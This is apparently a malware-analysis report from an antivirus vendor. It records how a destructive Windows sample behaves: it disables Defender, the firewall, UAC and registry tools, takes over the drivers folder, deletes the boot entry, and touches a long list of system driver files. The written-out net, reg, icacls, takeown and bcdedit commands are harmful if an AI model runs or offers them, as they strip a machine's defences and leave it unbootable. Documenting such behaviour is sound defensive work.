Technical Information
- Registry Editor (RegEdit)
- User Account Control (UAC)
- '<SYSTEM32>\net.exe' stop "Security Center"
- '<SYSTEM32>\net.exe' stop "WinDefend"
- '<SYSTEM32>\net.exe' stop MpsSvc
- '<SYSTEM32>\taskkill.exe' /f /t /im FirewallControlPanel.exe
- '<SYSTEM32>\netsh.exe' firewall set opmode mode=disable
- '<SYSTEM32>\taskkill.exe' /f /t /im "MSASCui.exe"
- '<SYSTEM32>\net.exe' stop "WSearch"
- '<SYSTEM32>\net.exe' stop "SDRSVC"
- <SYSTEM32>\cmd.exe
- %TEMP%\7760.tmp\7771.bat
- <DRIVERS>\1394bus.sys
- <DRIVERS>\secdrv.sys
- <DRIVERS>\stexstor.sys
- <DRIVERS>\srvnet.sys
- <DRIVERS>\srv2.sys
- <DRIVERS>\srv.sys
- <DRIVERS>\spsys.sys
- <DRIVERS>\spldr.sys
- <DRIVERS>\storport.sys
- <DRIVERS>\smclib.sys
- <DRIVERS>\sisraid4.sys
- <DRIVERS>\sisraid2.sys
- <DRIVERS>\sfloppy.sys
- <DRIVERS>\sffp_sd.sys
- <DRIVERS>\sffp_mmc.sys
- <DRIVERS>\sffdisk.sys
- <DRIVERS>\sermouse.sys
- <DRIVERS>\smb.sys
- <DRIVERS>\serial.sys
- <DRIVERS>\stream.sys
- <DRIVERS>\swenum.sys
- <DRIVERS>\uagp35.sys
- <DRIVERS>\tunnel.sys
- <DRIVERS>\tsusbhub.sys
- <DRIVERS>\tsusbgd.sys
- <DRIVERS>\tsusbflt.sys
- <DRIVERS>\tssecsrv.sys
- <DRIVERS>\terminpt.sys
- <DRIVERS>\tdtcp.sys
- <DRIVERS>\termdd.sys
- <DRIVERS>\tdx.sys
- <DRIVERS>\tdpipe.sys
- <DRIVERS>\tdi.sys
- <DRIVERS>\tcpipreg.sys
- <DRIVERS>\tcpip.sys
- <DRIVERS>\tape.sys
- <DRIVERS>\Synth3dVsc.sys
- <DRIVERS>\storvsc.sys
- <DRIVERS>\serenum.sys
- <DRIVERS>\scsiport.sys
- <DRIVERS>\scfilter.sys
- <DRIVERS>\pci.sys
- <DRIVERS>\portcls.sys
- <DRIVERS>\peauth.sys
- <DRIVERS>\pcw.sys
- <DRIVERS>\pcmcia.sys
- <DRIVERS>\pciidex.sys
- <DRIVERS>\pciide.sys
- <DRIVERS>\processr.sys
- <DRIVERS>\ql2300.sys
- <DRIVERS>\ql40xx.sys
- <DRIVERS>\pacer.sys
- <DRIVERS>\ohci1394.sys
- <DRIVERS>\nwifi.sys
- <DRIVERS>\nv_agp.sys
- <DRIVERS>\nvstor.sys
- <DRIVERS>\nvraid.sys
- <DRIVERS>\parport.sys
- <DRIVERS>\qwavedrv.sys
- <DRIVERS>\rspndr.sys
- <DRIVERS>\rasl2tp.sys
- <DRIVERS>\sbp2port.sys
- <DRIVERS>\rdpencdd.sys
- <DRIVERS>\rootmdm.sys
- <DRIVERS>\rndismp.sys
- <DRIVERS>\rmcast.sys
- <DRIVERS>\rdyboost.sys
- <DRIVERS>\rdpwd.sys
- <DRIVERS>\rdpvideominiport.sys
- <DRIVERS>\rdprefmp.sys
- <DRIVERS>\rdpdr.sys
- <DRIVERS>\rasacd.sys
- <DRIVERS>\rdpcdd.sys
- <DRIVERS>\rdpbus.sys
- <DRIVERS>\rdbss.sys
- <DRIVERS>\rassstp.sys
- <DRIVERS>\raspptp.sys
- <DRIVERS>\raspppoe.sys
- <DRIVERS>\null.sys
- <DRIVERS>\partmgr.sys
- <DRIVERS>\udfs.sys
- <DRIVERS>\usbhub.sys
- %WINDIR%\microsoft.net\Framework\v3.0\Windows Communication Foundation\system.servicemodel.dll
- %WINDIR%\microsoft.net\Framework\v3.0\Windows Communication Foundation\system.runtime.serialization.dll
- %WINDIR%\microsoft.net\Framework\v3.0\Windows Communication Foundation\smsvchost.exe
- %WINDIR%\microsoft.net\Framework\v3.0\Windows Communication Foundation\smdiagnostics.dll
- %WINDIR%\microsoft.net\Framework\v3.0\Windows Communication Foundation\smconfiginstaller.exe
- %WINDIR%\microsoft.net\Framework\v3.0\Windows Communication Foundation\servicemonikersupport.dll
- %WINDIR%\microsoft.net\Framework\v3.0\Windows Communication Foundation\servicemodelreg.exe
- <DRIVERS>\wmiacpi.sys
- %WINDIR%\microsoft.net\Framework\v3.0\Windows Communication Foundation\servicemodelinstallrc.dll
- %WINDIR%\microsoft.net\Framework\v3.0\Windows Communication Foundation\microsoft.transactions.bridge.dtc.dll
- %WINDIR%\microsoft.net\Framework\v3.0\Windows Communication Foundation\microsoft.transactions.bridge.dll
- %WINDIR%\microsoft.net\Framework\v3.0\Windows Communication Foundation\infocard.exe
- %WINDIR%\microsoft.net\Framework\v3.0\Windows Communication Foundation\comsvcconfig.exe
- <DRIVERS>\wudfrd.sys
- <DRIVERS>\wudfpf.sys
- <DRIVERS>\ws2ifsl.sys
- %WINDIR%\microsoft.net\Framework\v3.0\Windows Communication Foundation\servicemodelevents.dll
- <DRIVERS>\wmilib.sys
- %WINDIR%\microsoft.net\Framework\v3.0\Windows Communication Foundation\system.servicemodel.install.dll
- %WINDIR%\microsoft.net\Framework\v3.0\wpf\presentationhostdll.dll
- %WINDIR%\microsoft.net\Framework\v3.5\sql\en\sqlpersistenceproviderlogic.sql
- %WINDIR%\microsoft.net\Framework\v3.5\sql\en\dropsqlpersistenceproviderschema.sql
- %WINDIR%\microsoft.net\Framework\v3.5\sql\en\dropsqlpersistenceproviderlogic.sql
- %WINDIR%\microsoft.net\Framework\v3.0\wpf\XamlViewer\xamlviewer_v0300.xbap
- %WINDIR%\microsoft.net\Framework\v3.0\wpf\XamlViewer\xamlviewer_v0300.exe.manifest
- %WINDIR%\microsoft.net\Framework\v3.0\wpf\XamlViewer\xamlviewer_v0300.exe
- %WINDIR%\microsoft.net\Framework\v3.0\wpf\wpfgfx_v0300.dll
- %WINDIR%\microsoft.net\Framework\v3.0\Windows Communication Foundation\wsatconfig.exe
- %WINDIR%\microsoft.net\Framework\v3.0\Windows Communication Foundation\system.servicemodel.washosting.dll
- %WINDIR%\microsoft.net\Framework\v3.0\wpf\presentationcffrasterizer.dll
- %WINDIR%\microsoft.net\Framework\v3.0\wpf\penimc.dll
- %WINDIR%\microsoft.net\Framework\v3.0\Windows Communication Foundation\_transactionbridgeperfcounters.reg
- %WINDIR%\microsoft.net\Framework\v3.0\Windows Communication Foundation\_smsvchostperfcounters.reg
- %WINDIR%\microsoft.net\Framework\v3.0\Windows Communication Foundation\_servicemodelserviceperfcounters.reg
- %WINDIR%\microsoft.net\Framework\v3.0\Windows Communication Foundation\_servicemodeloperationperfcounters.reg
- %WINDIR%\microsoft.net\Framework\v3.0\Windows Communication Foundation\_servicemodelendpointperfcounters.reg
- %WINDIR%\microsoft.net\Framework\v3.0\wpf\presentationui.dll
- <DRIVERS>\winhv.sys
- <DRIVERS>\wfplwf.sys
- <DRIVERS>\mcd.sys
- <DRIVERS>\usbohci.sys
- <DRIVERS>\vdrvroot.sys
- <DRIVERS>\usbuhci.sys
- <DRIVERS>\usbstor.sys
- <DRIVERS>\usbrpm.sys
- <DRIVERS>\usbprint.sys
- <DRIVERS>\usbport.sys
- <DRIVERS>\viaide.sys
- <DRIVERS>\vgapnp.sys
- <DRIVERS>\vhdmp.sys
- <DRIVERS>\usbd.sys
- <DRIVERS>\usbcir.sys
- <DRIVERS>\usbccgp.sys
- <DRIVERS>\usbcamd2.sys
- <DRIVERS>\usb8023.sys
- <DRIVERS>\umpass.sys
- <DRIVERS>\usbehci.sys
- <DRIVERS>\videoprt.sys
- <DRIVERS>\wdfldr.sys
- <DRIVERS>\uliagpkx.sys
- <DRIVERS>\vga.sys
- <DRIVERS>\wdf01000.sys
- <DRIVERS>\wd.sys
- <DRIVERS>\watchdog.sys
- <DRIVERS>\wanarp.sys
- <DRIVERS>\wacompen.sys
- <DRIVERS>\vwifimp.sys
- <DRIVERS>\vwififlt.sys
- <DRIVERS>\vwifibus.sys
- <DRIVERS>\vsmraid.sys
- <DRIVERS>\volsnap.sys
- <DRIVERS>\volmgrx.sys
- <DRIVERS>\volmgr.sys
- <DRIVERS>\vmstorfl.sys
- <DRIVERS>\vms3cap.sys
- <DRIVERS>\vmbushid.sys
- <DRIVERS>\vmbus.sys
- <DRIVERS>\umbus.sys
- <DRIVERS>\ntfs.sys
- <DRIVERS>\nsiproxy.sys
- <DRIVERS>\npfs.sys
- <DRIVERS>\discache.sys
- <DRIVERS>\dumpata.sys
- <DRIVERS>\drmkaud.sys
- <DRIVERS>\drmk.sys
- <DRIVERS>\dmvsc.sys
- <DRIVERS>\diskdump.sys
- <DRIVERS>\disk.sys
- <DRIVERS>\dxg.sys
- <DRIVERS>\dxapi.sys
- <DRIVERS>\cmbatt.sys
- <DRIVERS>\crcdisk.sys
- <DRIVERS>\crashdmp.sys
- <DRIVERS>\CompositeBus.sys
- <DRIVERS>\compbatt.sys
- <DRIVERS>\cng.sys
- <DRIVERS>\cmdide.sys
- <DRIVERS>\csc.sys
- <DRIVERS>\dfsc.sys
- <DRIVERS>\dxgmms1.sys
- <DRIVERS>\classpnp.sys
- <DRIVERS>\flpydisk.sys
- <DRIVERS>\filetrace.sys
- <DRIVERS>\fileinfo.sys
- <DRIVERS>\fdc.sys
- <DRIVERS>\fastfat.sys
- <DRIVERS>\exfat.sys
- <DRIVERS>\dxgkrnl.sys
- <DRIVERS>\fltmgr.sys
- <DRIVERS>\evbda.sys
- <DRIVERS>\etc\networks
- <DRIVERS>\etc\lmhosts.sam
- <DRIVERS>\etc\hosts
- <DRIVERS>\errdev.sys
- <DRIVERS>\elxstor.sys
- <DRIVERS>\e1g6032e.sys
- <DRIVERS>\etc\services
- <DRIVERS>\etc\protocol
- <DRIVERS>\circlass.sys
- <DRIVERS>\cdrom.sys
- <DRIVERS>\amdxata.sys
- <DRIVERS>\amdsata.sys
- <DRIVERS>\amdppm.sys
- <DRIVERS>\amdk8.sys
- <DRIVERS>\amdide.sys
- <DRIVERS>\aliide.sys
- <DRIVERS>\appid.sys
- <DRIVERS>\agp440.sys
- <DRIVERS>\afd.sys
- <DRIVERS>\adpu320.sys
- <DRIVERS>\adpahci.sys
- <DRIVERS>\adp94xx.sys
- <DRIVERS>\acpipmi.sys
- <DRIVERS>\acpi.sys
- <DRIVERS>\1394ohci.sys
- <DRIVERS>\agilevpn.sys
- <DRIVERS>\arc.sys
- <DRIVERS>\arcsas.sys
- <DRIVERS>\amdsbs.sys
- <DRIVERS>\asyncmac.sys
- <DRIVERS>\bxvbda.sys
- <DRIVERS>\brfiltlo.sys
- <DRIVERS>\bthmodem.sys
- <DRIVERS>\brusbser.sys
- <DRIVERS>\brusbmdm.sys
- <DRIVERS>\brserwdm.sys
- <DRIVERS>\brserid.sys
- <DRIVERS>\bridge.sys
- <DRIVERS>\brfiltup.sys
- <DRIVERS>\bowser.sys
- <DRIVERS>\cdfs.sys
- <DRIVERS>\blbdrive.sys
- <DRIVERS>\beep.sys
- <DRIVERS>\battc.sys
- <DRIVERS>\b57nd60a.sys
- <DRIVERS>\ataport.sys
- <DRIVERS>\atapi.sys
- <DRIVERS>\fsdepends.sys
- <DRIVERS>\fs_rec.sys
- <DRIVERS>\dumpfve.sys
- <DRIVERS>\fvevol.sys
- <DRIVERS>\Msft_User_WpdFs_01_09_00.Wdf
- <DRIVERS>\mrxsmb.sys
- <DRIVERS>\msftwdf_kernel_01009_inbox_critical.wdf
- <DRIVERS>\msfs.sys
- <DRIVERS>\msdsm.sys
- <DRIVERS>\msahci.sys
- <DRIVERS>\mrxsmb20.sys
- <DRIVERS>\mrxsmb10.sys
- <DRIVERS>\msiscsi.sys
- <DRIVERS>\mshidkmdf.sys
- <DRIVERS>\msisadrv.sys
- <DRIVERS>\mpio.sys
- <DRIVERS>\mountmgr.sys
- <DRIVERS>\mouhid.sys
- <DRIVERS>\mouclass.sys
- <DRIVERS>\monitor.sys
- <DRIVERS>\modem.sys
- <DRIVERS>\mpsdrv.sys
- <DRIVERS>\mskssrv.sys
- <DRIVERS>\nfrd960.sys
- <DRIVERS>\megasr.sys
- <DRIVERS>\fwpkclnt.sys
- <DRIVERS>\netio.sys
- <DRIVERS>\netbt.sys
- <DRIVERS>\netbios.sys
- <DRIVERS>\ndproxy.sys
- <DRIVERS>\ndiswan.sys
- <DRIVERS>\ndisuio.sys
- <DRIVERS>\ndistapi.sys
- <DRIVERS>\ndiscap.sys
- <DRIVERS>\ndis.sys
- <DRIVERS>\mup.sys
- <DRIVERS>\mtconfig.sys
- <DRIVERS>\mstee.sys
- <DRIVERS>\mssmbios.sys
- <DRIVERS>\msrpc.sys
- <DRIVERS>\mspqm.sys
- <DRIVERS>\mspclock.sys
- <DRIVERS>\mrxdav.sys
- <DRIVERS>\wimmount.sys
- %WINDIR%\microsoft.net\Framework\v3.5\sql\en\sqlpersistenceproviderschema.sql
- <DRIVERS>\luafv.sys
- <DRIVERS>\hwpolicy.sys
- <DRIVERS>\http.sys
- <DRIVERS>\hpsamd.sys
- <DRIVERS>\hidusb.sys
- <DRIVERS>\hidparse.sys
- <DRIVERS>\hidir.sys
- <DRIVERS>\iastorv.sys
- <DRIVERS>\hidclass.sys
- <DRIVERS>\hidbatt.sys
- <DRIVERS>\hdaudio.sys
- <DRIVERS>\hdaudbus.sys
- <DRIVERS>\hcw85cir.sys
- <DRIVERS>\gmreadme.txt
- <DRIVERS>\gm.dls
- <DRIVERS>\gagp30kx.sys
- <DRIVERS>\hidbth.sys
- <DRIVERS>\iirsp.sys
- <DRIVERS>\i8042prt.sys
- <DRIVERS>\intelide.sys
- <DRIVERS>\lsi_scsi.sys
- <DRIVERS>\ks.sys
- <DRIVERS>\lsi_sas2.sys
- <DRIVERS>\lsi_sas.sys
- <DRIVERS>\lsi_fc.sys
- <DRIVERS>\lltdio.sys
- <DRIVERS>\ksthunk.sys
- <DRIVERS>\ksecpkg.sys
- <DRIVERS>\ksecdd.sys
- <DRIVERS>\kbdhid.sys
- <DRIVERS>\intelppm.sys
- <DRIVERS>\kbdclass.sys
- <DRIVERS>\isapnp.sys
- <DRIVERS>\irenum.sys
- <DRIVERS>\irda.sys
- <DRIVERS>\ipnat.sys
- <DRIVERS>\ipmidrv.sys
- <DRIVERS>\ipfltdrv.sys
- <DRIVERS>\megasas.sys
- %TEMP%\7760.tmp\7771.bat
- 'localhost':65007
- 'localhost':51561
- ClassName: '' WindowName: ''
- '<SYSTEM32>\cmd.exe' /c "%TEMP%\7760.tmp\7771.bat <Full path to file>"
- '<SYSTEM32>\reg.exe' ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
- '<SYSTEM32>\net1.exe' stop "Security Center"
- '<SYSTEM32>\net1.exe' stop "WinDefend"
- '<SYSTEM32>\reg.exe' add HKLM\Software\Policies\Microsoft\WindowsDefender /v DisableAntiSpyware /t REG_DWORD /d 1 /f
- '<SYSTEM32>\reg.exe' add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 00000001 /f
- '<SYSTEM32>\net1.exe' stop MpsSvc
- '<SYSTEM32>\takeown.exe' /F "<DRIVERS>"
- '<SYSTEM32>\icacls.exe' <DRIVERS> /grant everyone:F
- '<SYSTEM32>\bcdedit.exe' /delete {current}
- '<SYSTEM32>\net1.exe' stop "WSearch"
- '<SYSTEM32>\net1.exe' stop "SDRSVC"